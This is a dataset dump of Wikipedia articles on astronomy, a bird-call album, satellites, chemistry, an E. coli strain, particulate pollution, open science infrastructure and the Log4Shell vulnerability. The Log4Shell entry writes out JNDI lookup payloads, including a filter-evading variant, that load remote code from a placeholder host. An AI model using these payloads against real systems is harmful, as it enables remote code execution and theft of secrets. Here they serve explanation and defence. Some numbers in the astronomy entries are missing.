id int64 39 79M | url stringlengths 31 227 | text stringlengths 6 334k | source stringlengths 1 150 ⌀ | categories listlengths 1 6 | token_count int64 3 71.8k | subcategories listlengths 0 30 |
|---|---|---|---|---|---|---|
69,475,198 | https://en.wikipedia.org/wiki/GP%20Comae%20Berenices | GP Comae Berenices, abbreviated to GP Com and also known as G 61-29, is a star system composed of a white dwarf orbited by a planetary-mass object, likely the highly eroded core of another white dwarf. The white dwarf is slowly accreting material from its companion at a rate of /year and has been identified as a low-activity AM CVn star. The system shows signs of a high abundance of ionized nitrogen from the accretion disk around the primary.
Planetary system
The material transferred from the planetary-mass companion is mostly helium, with a molar ratio of nitrogen of up to 1.7%, very low neon levels, and no other elements detectable. Approximately half of the system's luminosity comes from the accretion disk. The planetary object is suspected to contain a strange quark matter core because of its unusually high density, which must be above to prevent tidal disruption; the theoretical bound for planets composed solely of ordinary matter is on the order of . The object's orbit is expected to decay within 100 million years due to gravitational wave emission.
References
AM CVn stars
White dwarfs
Planetary systems with one confirmed planet
Coma Berenices
J13054243+1801039
Comae Berenices, GP | GP Comae Berenices | [
"Astronomy"
] | 263 | [
"Coma Berenices",
"Constellations"
] |
69,476,862 | https://en.wikipedia.org/wiki/Australian%20Bird%20Calls | Australian Bird Calls (also referred to as Songs of Disappearance: Australian Bird Calls and just Songs of Disappearance) is an album of Australian bird calls, released on 3 December 2021 by the Bowerbird Collective and BirdLife Australia. It was created to bring attention to endangered and threatened species of Australian birds. The recordings were made by nature recordist David Stewart and Nature Sound.
Following its physical release, Australian Bird Calls peaked at number two on the Australian ARIA Charts.
Although the title initially appeared as Songs of Disappearance, that name later became the de facto "artist" credit for the Bowerbird Collective's effort to bring attention to threatened and endangered Australian species, with the album itself taking on the title Australian Bird Calls when a "sequel" album of frog calls, Australian Frog Calls, also attributed to Songs of Disappearance, was released on 2 December 2022.
Background
The album came from an idea by Anthony Albrecht, a PhD student at Charles Darwin University and co-founder of the Bowerbird Collective, and his supervisor Stephen Garnett, who wrote the report The Action Plan for Australian Birds 2020, published in December 2021, which found one in six (216 out of 1,299) Australian bird species are threatened. Garnett's report, released in collaboration with BirdLife Australia, further identified 50 species of Australian birds closest to "facing extinction due to lack of policy support and rampant climate change".
Violinist Simone Slattery, the other co-founder of Bowerbird Collective, arranged the first track, a collage of the 53 bird songs recorded by David Stewart over four decades. Slattery said she kept listening to the isolated bird calls until a structure came to mind "like a quirky dawn chorus. Some of these sounds will shock listeners because they're extremely percussive, they're not melodious at all. They're clicks, they're rattles, they're squawks and deep bass notes." The Guardian noted the "morse code-like song" of the night parrot, which had not been heard until 2013, as well as the call of the regent honeyeater, a bird now considered "so rare that it is literally losing its own voice out of loneliness".
BirdLife Australia CEO Paul Sullivan called the album "some rare recordings of birds that may not survive if we don't come together to protect them. While this campaign is fun, there's a serious side to what we're doing, and it's been heartening to see bird enthusiasts showing governments and businesses that Australians care about these important birds."
Reception
A staff writer at The Music gave the album four-and-a-half out of five stars and posted a review consisting entirely of bird noises.
Commercial performance
The album debuted at number five on the Australian ARIA Albums Chart dated 13 December 2021, selling over 2,000 units, with 1,500 of those being pre-ordered copies. The following week, it ascended to number three. It later re-entered at number two.
Track listing
Charts
Release history
References
External links
Official website
2021 albums
Animal sounds | Australian Bird Calls | [
"Biology"
] | 631 | [
"Ethology",
"Behavior",
"Animal sounds"
] |
69,478,068 | https://en.wikipedia.org/wiki/Kosmos%202524 | Kosmos 2524 is a Russian reconnaissance satellite that is part of the ELINT Liana program. Developed and built by TsSKB Progress and KB Arsenal, it was launched on December 2, 2017. It is based on the Yantar satellite bus.
Launch
Despite the launch failure of another Soyuz 2-1B rocket just four days before, Kosmos 2524 launched on December 2, 2017, from Plesetsk Cosmodrome Site 43 at 10:43 UTC. It was launched to a low Earth orbit with a periapsis of , an apoapsis of and an inclination of 67.1°, allowing it to cover much of the world.
References
2017 in spaceflight
Spacecraft launched in 2017
Satellites of Russia
Satellites in low Earth orbit
Reconnaissance satellites of Russia
Signals intelligence satellites | Kosmos 2524 | [
"Astronomy"
] | 160 | [
"Astronomy stubs",
"Spacecraft stubs"
] |
69,479,403 | https://en.wikipedia.org/wiki/5%20Trianguli | 5 Trianguli is a solitary star located in the northern constellation Triangulum. With an apparent magnitude of 6.23, it is barely visible to the naked eye under ideal conditions. The star is located 399 light years away from the Solar System and is drifting farther away with a radial velocity of 7.7 km/s.
5 Trianguli has a classification of A0 Vm, indicating that it is an A-type main-sequence star with unusually strong metallic lines. It has 2.22 times the mass of the Sun and 2.96 times the radius of the Sun. 5 Trianguli radiates 48 solar luminosities from its photosphere at an effective temperature of 8,836 K, giving it the white hue typical of an A-type star. It has a low projected rotational velocity of 15 km/s, which is common for Am stars.
References
A-type main-sequence stars
Am stars
Triangulum
Trianguli, 5
0634
010220
013372 | 5 Trianguli | [
"Astronomy"
] | 215 | [
"Triangulum",
"Constellations"
] |
69,481,211 | https://en.wikipedia.org/wiki/Scandium%20phosphide | Scandium phosphide is an inorganic compound of scandium and phosphorus with the chemical formula .
Synthesis
ScP can be obtained by the reaction of scandium and phosphorus at 1000 °C.
Physical properties
Calculations indicate that this compound is a semiconductor, with potential applications in high-power, high-frequency electronics and in laser diodes.
Chemical properties
ScP can be arc-melted with cobalt or nickel to obtain ScCoP and ScNiP.
References
Phosphides
Scandium compounds
Semiconductors
Rock salt crystal structure | Scandium phosphide | [
"Physics",
"Chemistry",
"Materials_science",
"Engineering"
] | 104 | [
"Electrical resistance and conductance",
"Physical quantities",
"Semiconductors",
"Materials",
"Electronic engineering",
"Condensed matter physics",
"Solid state engineering",
"Matter"
] |
69,481,760 | https://en.wikipedia.org/wiki/Escherichia%20coli%20NC101 | Escherichia coli NC101 is a mouse isolate, serotype O2:H6/41, that is a pro-carcinogenic, adherent-invasive (AIEC), probiotic strain of Escherichia coli, a species of bacteria that thrives in the intestines of mammals. NC101 has also been identified as a nicotinic acid (NA) auxotroph and as a pathobiont, an organism that is harmful under certain circumstances. It is a relevant model organism for demonstrating how susceptible individuals may mount inappropriate immune responses to seemingly benign intestinal E. coli.
History
NC101 was first isolated from a specific-pathogen-free wild-type mouse at North Carolina State University between 2004 and 2005. Sequencing of NC101 showed that it has a missense mutation in nadA, a gene that encodes quinolinate synthase A, which is necessary for de novo nicotinamide adenine dinucleotide (NAD) biosynthesis.
Effects
E. coli NC101 has been found to promote carcinoma, specifically mucinous adenocarcinoma, in experiments with azoxymethane-treated mice. The study concluded that the strain promotes "...tumorigenesis by altering microbial composition and inducing the expansion of microorganisms with genotoxic capabilities." The frequency of specific E. coli strains like NC101 in laboratory mouse colonies is currently unknown.
See also
Escherichia coli
Escherichia
Pseudomonadota
Enterobacteriaceae
References
Carcinogenesis
Escherichia coli | Escherichia coli NC101 | [
"Biology"
] | 343 | [
"Model organisms",
"Escherichia coli"
] |
69,481,773 | https://en.wikipedia.org/wiki/Log4Shell | Log4Shell (CVE-2021-44228) is a zero-day vulnerability reported in November 2021 in Log4j, a popular Java logging framework, involving arbitrary code execution. The vulnerability had existed unnoticed since 2013 and was privately disclosed to the Apache Software Foundation, of which Log4j is a project, by Chen Zhaojun of Alibaba Cloud's security team on 24 November 2021.
Before an official CVE identifier was made available on 10 December 2021, the vulnerability circulated with the name "Log4Shell", given by Free Wortley of the LunaSec team, which was initially used to track the issue online. Apache gave Log4Shell a CVSS severity rating of 10, the highest available score. The exploit was simple to execute and is estimated to have had the potential to affect hundreds of millions of devices.
The vulnerability takes advantage of Log4j allowing lookup requests to arbitrary LDAP and other JNDI servers, which lets attackers execute arbitrary Java code on a server or other computer, or leak sensitive information. A list of its affected software projects has been published by the Apache Security Team. Affected commercial services include Amazon Web Services, Cloudflare, iCloud, Minecraft: Java Edition, Steam, Tencent QQ and many others. According to Wiz and EY, the vulnerability affected 93% of enterprise cloud environments.
The vulnerability's disclosure received strong reactions from cybersecurity experts. Cybersecurity company Tenable said the exploit was "the single biggest, most critical vulnerability ever," Ars Technica called it "arguably the most severe vulnerability ever" and The Washington Post said that descriptions by security professionals "border on the apocalyptic."
Background
Log4j is an open-source logging framework that allows software developers to log data within their applications, and can include user input. It is used ubiquitously in Java applications, especially enterprise software. Originally written in 2001 by Ceki Gülcü, it is now part of Apache Logging Services, a project of the Apache Software Foundation. Tom Kellermann, a member of President Obama's Commission on Cyber Security, described Apache as "one of the giant supports of a bridge that facilitates the connective tissue between the worlds of applications and computer environments".
Behavior
The Java Naming and Directory Interface (JNDI) allows for lookup of Java objects at program runtime given a path to their data. JNDI can use several directory interfaces, each providing a different scheme of looking up files. Among these interfaces is the Lightweight Directory Access Protocol (LDAP), a non-Java-specific protocol which retrieves the object data as a URL from an appropriate server, either local or anywhere on the Internet.
In the default configuration, when logging a string, Log4j 2 performs string substitution on expressions of the form ${prefix:name}. For example, Text: ${java:version} might be converted to Text: Java version 1.7.0_67. Among the recognized expressions is ${jndi:<lookup>}; by specifying the lookup to be through LDAP, an arbitrary URL may be queried and loaded as Java object data. ${jndi:ldap://example.com/file}, for example, will load data from that URL if connected to the Internet. By inputting a string that is logged, an attacker can load and execute malicious code hosted on a public URL. Even if execution of the data is disabled, an attacker can still retrieve data—such as secret environment variables—by placing them in the URL, in which case they will be substituted and sent to the attacker's server. Besides LDAP, other potentially exploitable JNDI lookup protocols include its secure variant LDAPS, Java Remote Method Invocation (RMI), the Domain Name System (DNS), and the Internet Inter-ORB Protocol (IIOP).
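The lookup-expansion behavior can be sketched with a simplified, hypothetical model in Python (this is not Log4j's implementation; the lookup handlers and the `attacker.example` URL are illustrative placeholders):

```python
import re

# Toy model of Log4j 2's ${prefix:value} string substitution. Real Log4j
# resolves many prefixes (jndi, env, lower, ...); this models just enough
# to show why logging untrusted input triggers a lookup.
def resolve(message, lookups):
    pattern = re.compile(r"\$\{([a-z]+):([^${}]*)\}")
    while (match := pattern.search(message)) is not None:
        prefix, value = match.group(1), match.group(2)
        handler = lookups.get(prefix, lambda v: "")
        message = message[:match.start()] + handler(value) + message[match.end():]
    return message

fetched_urls = []  # records what a real JNDI lookup would dereference

lookups = {
    "java": lambda v: "Java version 1.7.0_67" if v == "version" else "",
    # Real Log4j would fetch this URL and load the result as a Java object.
    "jndi": lambda v: (fetched_urls.append(v) or "<object from " + v + ">"),
}

print(resolve("Text: ${java:version}", lookups))
# → Text: Java version 1.7.0_67
print(resolve("User-Agent: ${jndi:ldap://attacker.example/a}", lookups))
# → User-Agent: <object from ldap://attacker.example/a>
```

Because the substitution runs on the formatted log message itself, any attacker-controlled string that reaches the logger is enough to trigger the lookup.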
Because HTTP requests are frequently logged, a common attack vector is placing the malicious string in the HTTP request URL or a commonly logged HTTP header, such as User-Agent. Early mitigations included blocking any requests containing potentially malicious contents, such as ${jndi. Such basic string matching solutions can be circumvented by obfuscating the request: ${${lower:j}ndi, for example, will be converted into a JNDI lookup after performing the lowercase operation on the letter j. Even if an input, such as a first name, is not immediately logged, it may be later logged during internal processing and its contents executed.
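The filter-evasion problem can be seen in a minimal sketch (illustrative only; `attacker.example` is a placeholder):

```python
# A naive WAF-style rule that blocks requests containing the literal "${jndi".
def naive_filter_blocks(request: str) -> bool:
    return "${jndi" in request

payload = "${${lower:j}ndi:ldap://attacker.example/a}"

# The obfuscated payload sails past the filter...
assert not naive_filter_blocks(payload)

# ...but after Log4j resolves the inner ${lower:j} expression, the string
# has become a plain JNDI lookup.
resolved_once = payload.replace("${lower:j}", "j")
assert resolved_once == "${jndi:ldap://attacker.example/a}"
assert naive_filter_blocks(resolved_once)
```

Robust filtering therefore has to happen after (or account for) the recursive substitution, not on the raw request bytes.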
Mitigation
Fixes for this vulnerability were released on 6 December 2021, three days before the vulnerability was published, in Log4j version 2.15.0-rc1. The fix included restricting the servers and protocols that may be used for lookups. Researchers discovered a related bug, CVE-2021-45046, that allows local or remote code execution in certain non-default configurations and was fixed in version 2.16.0, which disabled all features using JNDI and support for message lookups. Two more vulnerabilities in the library were found: a denial-of-service attack, tracked as CVE-2021-45105 and fixed in 2.17.0; and a difficult-to-exploit remote code execution vulnerability, tracked as CVE-2021-44832 and fixed in 2.17.1. For previous versions, the class org.apache.logging.log4j.core.lookup.JndiLookup needs to be removed from the classpath to mitigate both vulnerabilities. An early recommended fix for older versions was to set the system property log4j2.formatMsgNoLookups to true, but this change does not prevent exploitation of CVE-2021-45046 and was later found to not disable message lookups in certain cases.
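The class removal can be scripted. The sketch below is an illustrative Python equivalent of the widely circulated `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class` one-liner; file paths are placeholders:

```python
import shutil
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

def strip_jndi_lookup(jar_path: str) -> bool:
    """Rewrite the jar without the JndiLookup class entry.
    Returns True if the entry was present and removed."""
    tmp_path = jar_path + ".tmp"
    removed = False
    # Copy every entry except JndiLookup.class into a fresh archive,
    # then atomically replace the original jar with it.
    with zipfile.ZipFile(jar_path) as src, \
         zipfile.ZipFile(tmp_path, "w", zipfile.ZIP_DEFLATED) as dst:
        for item in src.infolist():
            if item.filename == JNDI_CLASS:
                removed = True
            else:
                dst.writestr(item, src.read(item.filename))
    shutil.move(tmp_path, jar_path)
    return removed
```

Writing to a temporary file and moving it into place, rather than editing the jar in place, avoids leaving a corrupt archive if the process is interrupted mid-copy.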
Newer versions of the Java Runtime Environment (JRE) also mitigate this vulnerability by blocking remote code from being loaded by default, although other attack vectors still exist in certain applications. Several methods and tools have been published that help detect vulnerable Log4j versions used in built Java packages.
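Many such detection tools reduce to a recursive scan for jars that bundle the JndiLookup class. A hypothetical helper (not any particular published scanner) might look like:

```python
import pathlib
import zipfile

def jars_bundling_jndi_lookup(root):
    """Yield paths of jars under `root` that bundle Log4j 2's JndiLookup
    class. Presence alone does not prove exploitability; the bundled
    Log4j version must still be checked against the fixed releases."""
    for jar in pathlib.Path(root).rglob("*.jar"):
        try:
            with zipfile.ZipFile(jar) as z:
                if any(n.endswith("log4j/core/lookup/JndiLookup.class")
                       for n in z.namelist()):
                    yield jar
        except zipfile.BadZipFile:
            continue  # skip corrupt or non-zip files with a .jar suffix
```

A production scanner would additionally need to recurse into nested ("fat") jars and shaded packages, which this sketch does not attempt.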
Where applying updated versions has not been possible, due to a variety of constraints such as lack of resources or third-party managed solutions, filtering outbound network traffic from vulnerable deployments has been the primary recourse for many. The approach is recommended by NCC Group and the National Cyber Security Centre (United Kingdom), and is an example of a defense in depth measure. The effectiveness of such filtering is evidenced by laboratory experiments conducted with firewalls capable of intercepting the egress traffic with several wholly or partially vulnerable versions of the library itself and the JRE.
Usage
The exploit allows hackers to gain control of vulnerable devices running Java. Some hackers employ the vulnerability to use victims' devices for cryptocurrency mining, creating botnets, sending spam, establishing backdoors and other illegal activities such as ransomware attacks. In the days following the vulnerability's disclosure, Check Point observed millions of attacks being initiated by hackers, with some researchers observing a rate of over one hundred attacks per minute, ultimately resulting in attempted attacks on over 40% of business networks internationally.
According to Cloudflare CEO Matthew Prince, evidence of exploitation of or scanning for the exploit goes back as early as 1 December, nine days before it was publicly disclosed. According to cybersecurity firm GreyNoise, several IP addresses were scraping websites to check for servers that had the vulnerability. Several botnets began scanning for the vulnerability, including the Muhstik botnet by 10 December, as well as Mirai and Tsunami. Ransomware group Conti was observed using the vulnerability on 17 December.
Some state-sponsored groups in China and Iran also utilized the exploit according to Check Point, but it is not known if the exploit was used by Israel, Russia or the United States prior to the disclosure of the vulnerability. Check Point said that on 15 December 2021, Iran-backed hackers attempted to infiltrate the networks of Israeli businesses and government institutions.
Response and impact
Governmental
In the United States, the director of the Cybersecurity and Infrastructure Security Agency (CISA), Jen Easterly, described the exploit as "one of the most serious I've seen in my entire career, if not the most serious", explaining that hundreds of millions of devices were affected, and advised vendors to prioritize software updates. Civilian agencies contracted by the United States government had until 24 December 2021 to patch vulnerabilities. On 4 January, the Federal Trade Commission (FTC) stated its intent to pursue companies that fail to take reasonable steps to update Log4j software in use. A White House meeting underscored the importance to national security of the security maintenance of open-source software, which is often carried out largely by a few volunteers. While some open-source projects have many eyes on them, others do not have many, or any, people ensuring their security.
Germany's Bundesamt für Sicherheit in der Informationstechnik (BSI) designated the exploit as being at the agency's highest threat level, calling it an "extremely critical threat situation" (translated). It also reported that several attacks were already successful and that the extent of the exploit remained hard to assess. The Netherlands's National Cyber Security Centre (NCSC) began an ongoing list of vulnerable applications.
The Canadian Centre for Cyber Security (CCCS) called on organizations to take immediate action. The Canada Revenue Agency temporarily shut down its online services after learning of the exploit, while the Government of Quebec closed almost 4,000 of its websites as a "preventative measure." The Belgian Ministry of Defence experienced a breach attempt and was forced to shut down part of its network.
The Chinese Ministry of Industry and Information Technology suspended work with Alibaba Cloud as a cybersecurity threat intelligence partner for six months for failing to report the vulnerability to the government first.
Businesses
Research conducted by Wiz and EY showed that 93% of enterprise cloud environments were vulnerable to Log4Shell, and that 7% of vulnerable workloads were exposed to the Internet and prone to widespread exploitation attempts. According to the research, ten days after the vulnerability's disclosure (20 December 2021), only 45% of vulnerable workloads in cloud environments had been patched on average. Amazon, Google and Microsoft cloud data was affected by Log4Shell. Microsoft asked Windows and Azure customers to remain vigilant after observing state-sponsored and cyber-criminal attackers probing systems for the Log4j 'Log4Shell' flaw through December 2021.
The human resource management and workforce management company UKG, one of the largest businesses in the industry, was targeted by a ransomware attack that affected large businesses. UKG said it did not have evidence of Log4Shell being exploited in the incident, though analyst Allan Liska from cybersecurity company Recorded Future said there was possibly a connection.
As larger companies began to release patches for the exploit, the risk for small businesses increased as hackers focused on more vulnerable targets.
Privacy
Some personal devices connected to the Internet, such as smart TVs and security cameras, were vulnerable to the exploit. Some software may never get a patch due to discontinued manufacturer support.
Analysis
Almost half of all corporate networks globally were actively probed, with over 60 variants of the exploit produced within 24 hours. Check Point Software Technologies, in a detailed analysis, described the situation as "a true cyber-pandemic" and characterized the potential for damage as "incalculable". Several initial advisories exaggerated the number of packages that were vulnerable, leading to false positives. Most notably, the "log4j-api" package was marked as vulnerable, while further research showed that only the main "log4j-core" package was vulnerable. This was confirmed both in the original issue thread and by external security researchers.
Technology magazine Wired wrote that despite the previous "hype" surrounding multiple vulnerabilities, "the Log4j vulnerability... lives up to the hype for a host of reasons". The magazine explains that the pervasiveness of Log4j, the vulnerability being difficult to detect by potential targets and the ease of transmitting code to victims created a "combination of severity, simplicity, and pervasiveness that has the security community rattled". Wired also outlined stages of hackers using Log4Shell; cryptomining groups first using the vulnerability, data brokers then selling a "foothold" to cybercriminals, who finally go on to engage in ransomware attacks, espionage and destroying data.
Amit Yoran, CEO of Tenable and the founding director of the United States Computer Emergency Readiness Team, stated "[Log4Shell] is by far the single biggest, most critical vulnerability ever", noting that sophisticated attacks were beginning shortly after the bug, saying "We're also already seeing it leveraged for ransomware attacks, which, again, should be a major alarm bell ... We've also seen reports of attackers using Log4Shell to destroy systems without even looking to collect ransom, a fairly unusual behavior". Sophos's senior threat researcher Sean Gallagher said, "Honestly, the biggest threat here is that people have already gotten access and are just sitting on it, and even if you remediate the problem somebody's already in the network ... It's going to be around as long as the Internet."
According to a Bloomberg News report, some anger was directed at Apache's developers at their failure to fix the vulnerability after warnings about exploits of broad classes of software, including Log4j, were made at a 2016 cybersecurity conference.
References
External links
Log4j website
Common Vulnerabilities and Exposures page
National Vulnerabilities Database page
Projects affected by cve-2021-44228, by Apache Security Team
2021 in computing
Injection exploits
Computer security exploits | Log4Shell | [
"Technology"
] | 2,887 | [
"Computer security exploits",
"Injection exploits"
] |
69,482,866 | https://en.wikipedia.org/wiki/Particulate%20pollution | Particulate pollution is pollution of an environment that consists of particles suspended in some medium. There are three primary forms: atmospheric particulate matter, marine debris, and space debris. Some particles are released directly from a specific source, while others form in chemical reactions in the atmosphere. Particulate pollution can be derived from either natural sources or anthropogenic processes.
Atmospheric particulate matter
Atmospheric particulate matter, also known as particulate matter, or PM, describes solids and/or liquid particles suspended in a gas, most commonly the Earth's atmosphere. Particles in the atmosphere can be divided into two types, depending on the way they are emitted. Primary particles, such as mineral dust, are emitted into the atmosphere. Secondary particles, such as ammonium nitrate, are formed in the atmosphere through gas-to-particle conversion.
Sources
Some particulates occur naturally, originating from volcanoes, dust storms, forest and grassland fires, living vegetation and sea spray. Human activities, such as the burning of fossil fuels in vehicles, wood burning, stubble burning, power plants, road dust, wet cooling towers in cooling systems and various industrial processes, also generate significant amounts of particulates. In developing countries, coal combustion is the primary method for heating homes and supplying energy. Because sea-salt spray over the oceans is by far the most common form of particulate in the atmosphere, anthropogenic aerosols (those produced by human activities) currently account for about 10 percent of the total mass of aerosols in our atmosphere.
Microplastics are an emerging source of atmospheric pollution, particularly fine plastic fibers that are light enough to be carried by the wind. Airborne microplastics cannot be traced back to their specific original sources, as the wind can carry the minute particles thousands of miles from where they were originally shed. Microplastics are being found in very remote regions of the Earth with no apparent nearby sources of plastic. A common source of airborne microplastic fibers is plastic textiles. While most atmospheric microplastics come from land, microplastics also enter the atmosphere through ocean and sea mist.
Domestic combustion and wood smoke
Domestic combustion pollution arises mainly from burning fuels, including wood, gas, and charcoal, for heating, cooking, and agriculture, as well as from wildfires. Major domestic pollutants include carbon dioxide (17%), carbon monoxide (13%), nitrogen monoxide (6%), polycyclic aromatic hydrocarbons, and fine and ultrafine particles.
In the United Kingdom domestic combustion is the largest single source of PM2.5 annually. In some towns and cities in New South Wales wood smoke may be responsible for 60% of fine particle air pollution in the winter. Research conducted about biomass burning in 2015, estimated that 38% of European total particulate pollution emissions are composed of domestic wood burning.
Particulate pollutants are often microscopic, enabling them to infiltrate interior spaces even when windows and doors are closed. Black carbon, the main component of wood smoke, appears at significant levels in indoor environments compared to other ambient pollutants. A room sealed tightly enough to prevent wood smoke from entering will also prevent oxygen exchange with the outdoors. A regular dust mask offers little protection against particulate pollutants, since it is designed to filter out larger particles. A mask with a HEPA filter can filter out microscopic pollutants, but can make breathing difficult for people with lung disease.
Living under high concentrations of pollutants can lead to headaches, fatigue, lung disease, asthma, and throat and eye irritation. One of the most common diseases among those living among pollutants is chronic obstructive pulmonary disease (COPD). Exposure to wood and charcoal smoke is significantly associated with COPD diagnoses among residents of both developing and developed countries. Exposure to wood smoke irritates the respiratory system and increases the risk of hospital admission.
Marine debris
Marine debris and marine aerosols refer to particulates suspended in a liquid, usually water on the Earth's surface. Particulates in water are a kind of water pollution measured as total suspended solids, a water quality measurement listed as a conventional pollutant in the U.S. Clean Water Act, a water quality law. Notably, some of the same kinds of particles can be suspended both in air and water, and pollutants specifically may be carried in the air and deposited in water, or fall to the ground as acid rain. The majority of marine aerosols are created through the bursting of bubbles in breaking waves and capillary action on the ocean surface due to the stress exerted by surface winds. Pure sea salt aerosols are the major component of marine aerosols, with an annual global emission of between 2,000 and 10,000 teragrams. Through interactions with water, many marine aerosols help to scatter light and act as cloud condensation nuclei and ice nuclei (IN), thus affecting the atmospheric radiation budget. When they interact with anthropogenic pollution, marine aerosols can affect biogeochemical cycles through the depletion of acids such as nitric acid and halogens.
Space debris
Space debris describes particulates in the vacuum of outer space, specifically particles originating from human activity that remain in geocentric orbit around the Earth. The International Academy of Astronautics defines space debris as "any man-made Earth orbiting object which is non-functional with no reasonable expectation of assuming or resuming its intended function or any other function for which it is or can be expected to be authorized, including fragments and parts thereof".
Space debris is classified by size and operational purpose, and divided into four main subsets: inactive payloads, operational debris, fragmentation debris and microparticulate matter. Inactive payloads refer to any launched space objects that have lost the capability to reconnect to its corresponding space operator; thus, preventing a return to Earth. In contrast, operational debris describes the matter associated with the propulsion of a larger entity into space, which may include upper rocket stages and ejected nose cones. Fragmentation debris refers to any object in space that has become dissociated from a larger entity by means of explosion, collision or deterioration. Microparticulate matter describes space matter that typically cannot be seen singly with the naked eye, including particles, gases, and spaceglow.
In response to research that concluded that impacts from Earth orbital debris could lead to greater hazards to spacecraft than the natural meteoroid environment, NASA began the orbital debris program in 1979, initiated by the Space Sciences branch at Johnson Space Center (JSC). Beginning with an initial budget of $70,000, the NASA orbital debris program began with the initial goals of characterizing hazards induced by space debris and creating mitigation standards that would minimize the growth of the orbital debris environment. By 1990, the NASA orbital debris program created a debris monitoring program, which included mechanisms to sample the low Earth orbit (LEO) environment for debris as small as 6mm using the Haystack X-band ground radar.
Epidemiology
Particulate pollution is observed around the globe in varying sizes and compositions and is the focus of many epidemiological studies. Particulate matter (PM) is generally classified into two main size categories: PM10 and PM2.5. PM10, also known as coarse particulate matter, consists of particles 10 micrometers (μm) and smaller, while PM2.5, also called fine particulate matter, consists of particles 2.5 μm and smaller. Particles 2.5 μm or smaller in size are especially notable as they can be inhaled into the lower respiratory system, and with enough exposure, absorbed into the bloodstream. Particulate pollution can occur directly or indirectly from a number of sources including, but not limited to: agriculture, automobiles, construction, forest fires, chemical pollutants, and power plants.
Exposure to particulates of any size and composition may occur acutely over a short duration, or chronically over a long duration. Particulate exposure has been associated with adverse respiratory symptoms ranging from irritation of the airways, aggravated asthma, coughing, and difficulty breathing from acute exposure to symptoms such as irregular heartbeat, lung cancer, kidney disease, chronic bronchitis, and premature death in individuals who suffer from pre-existing cardiovascular or lung diseases due to chronic exposure. The severity of health effects generally depends upon the size of the particles as well as the health status of the individual exposed; older adults, children, pregnant women, and immunocompromised populations are at the greatest risk for adverse health outcomes. Short-term exposure to particulate pollution has been linked to adverse health impacts.
As a result, the US Environmental Protection Agency (EPA) and various health agencies around the world have established thresholds for concentrations of PM2.5 and PM10 that are determined to be acceptable. However, there is no known safe level of exposure, and thus any exposure to particulate pollution is likely to increase an individual's risk of adverse health effects. In European countries, air quality at or above 10 micrograms per cubic meter of air (μg/m3) for PM2.5 increases the all-cause daily mortality rate by 0.2-0.6% and the cardiopulmonary mortality rate by 6-13%.
Worldwide, PM10 concentrations of 70 μg/m3 and PM2.5 concentrations of 35 μg/m3 have been shown to increase long-term mortality by 15%. Moreover, approximately 4.2 million of all premature deaths observed in 2016 occurred due to airborne particulate pollution, 91% of which occurred in countries with low to middle socioeconomic status. Of these premature deaths, 58% were attributed to strokes and ischaemic heart diseases, 8% to COPD (Chronic Obstructive Pulmonary Disease), and 6% to lung cancer.
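As a back-of-the-envelope illustration, the attributable shares cited above can be turned into approximate death counts. All figures come from this paragraph; the variable names are illustrative:

```python
# Figures cited in the text: roughly 4.2 million premature deaths in 2016
# were attributed to airborne particulate pollution.
premature_deaths_2016 = 4_200_000

# Attributable shares of those deaths, also from the text.
attributable_shares = {
    "stroke and ischaemic heart disease": 0.58,
    "COPD": 0.08,
    "lung cancer": 0.06,
}

for cause, share in attributable_shares.items():
    print(f"{cause}: ~{round(share * premature_deaths_2016):,} deaths")
```

This yields roughly 2.44 million deaths from strokes and ischaemic heart disease, 336,000 from COPD, and 252,000 from lung cancer.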
In 2006, the EPA conducted air quality designations in all 50 states, denoting areas of high pollution based on criteria such as air quality monitoring data, recommendations submitted by the states, and other technical information. In 2012, it lowered the National Ambient Air Quality Standard for annual exposure to particulates in the 2.5 micrometers and smaller category from 15 μg/m3 to 12 μg/m3. U.S. annual PM2.5 averages subsequently decreased from 13.5 μg/m3 to 8.02 μg/m3 between 2000 and 2017.
Microplastics are particularly concerning as particulate matter because of their reactivity and capacity to carry contaminants. Microplastic particles, depending on their composition, can form carbonyl bonds on their surface, causing contaminants such as heavy metals to be adsorbed by the particle. When microplastic particles are inhaled, they persist in the lungs and cause inflammation. More research is needed to understand the long-term health effects of microplastics in the human body.
Environmental risks
Particulate matter (PM), particularly PM2.5, has been found to be harmful to aquatic organisms, including fish, crustaceans, and molluscs. In a study by Han et al., the effects of PM2.5 on life history traits and oxidative stress were observed in Tigriopus japonicus. Exposure to particulate matter less than 2.5 micrometers in diameter led to significant changes in reactive oxygen species (ROS) levels, indicating that particulate matter exposure was a causative agent of oxidative stress in Tigriopus japonicus. Negative effects of particulate matter have also been noted in mammals: following acute exposure to ambient particulate matter, rats showed a significant increase in neutrophils and a significant decrease in lymphocytes, indicating that particulate matter exposure can activate the sympathetic stress response.
Open Science Infrastructure

Open Science Infrastructure (or open scholarly infrastructure) is an information infrastructure that supports the open sharing of scientific productions such as publications, datasets, metadata, or code. In November 2021, the UNESCO Recommendation on Open Science described it as "shared research infrastructures that are needed to support open science and serve the needs of different communities".
Open science infrastructures are a form of scientific infrastructure (also called cyberinfrastructure, e-Science, or e-infrastructure) that supports the production of open knowledge. Beyond the management of common resources, they are frequently structured as community-led initiatives with a set of collective norms and governance regulations, which also makes them a form of knowledge commons. The definition of open science infrastructures usually excludes privately owned scientific infrastructures run by leading commercial publishers. Conversely, it may include actors not always characterized as scientific infrastructures that play a critical role in the ecosystem of open science, such as open-access publishing platforms (open scholarly communication services).
Computing infrastructures and online services have played a key role in the production and diffusion of scientific knowledge since the 1960s. While these early scientific infrastructures were initially envisioned as community initiatives, they could not be openly used due to the lack of interconnectivity and the cost of network connections. The creation of the World Wide Web made it possible to share data and publications on a large scale. The sustainability of online research projects and services became a critical policy issue and entailed the development of major infrastructures in the 2000s.
The concept of open science infrastructure emerged after 2015, following a scientific policy debate over the expansion of commercial and privately owned infrastructures into numerous research activities and the publication of the Principles for Open Scholarly Infrastructures. Since the 2010s, large ecosystems of interconnected scientific infrastructures have emerged in Europe, South America, and North America through the development of new open science projects and the conversion of legacy infrastructures to open science principles.
Definitions and terminology
Open science infrastructure is a form of knowledge infrastructure that makes it possible to create, publish, and maintain open scientific outputs such as publications, data, or software.
The UNESCO Recommendation on Open Science, approved in November 2021, defines open science infrastructures as "shared research infrastructures that are needed to support open science and serve the needs of different communities". The SPARC report on European open science infrastructure includes the following activities within the range of open science infrastructures: "We define Open Access & Open Science Infrastructure as sets of services, protocols, standards and software contributing to the research lifecycle – from collaboration and experimentation through data collection and storage, data organization, data analysis and computation, authorship, submission, review and annotation, copyediting, publishing, archiving, citation, discovery and more".
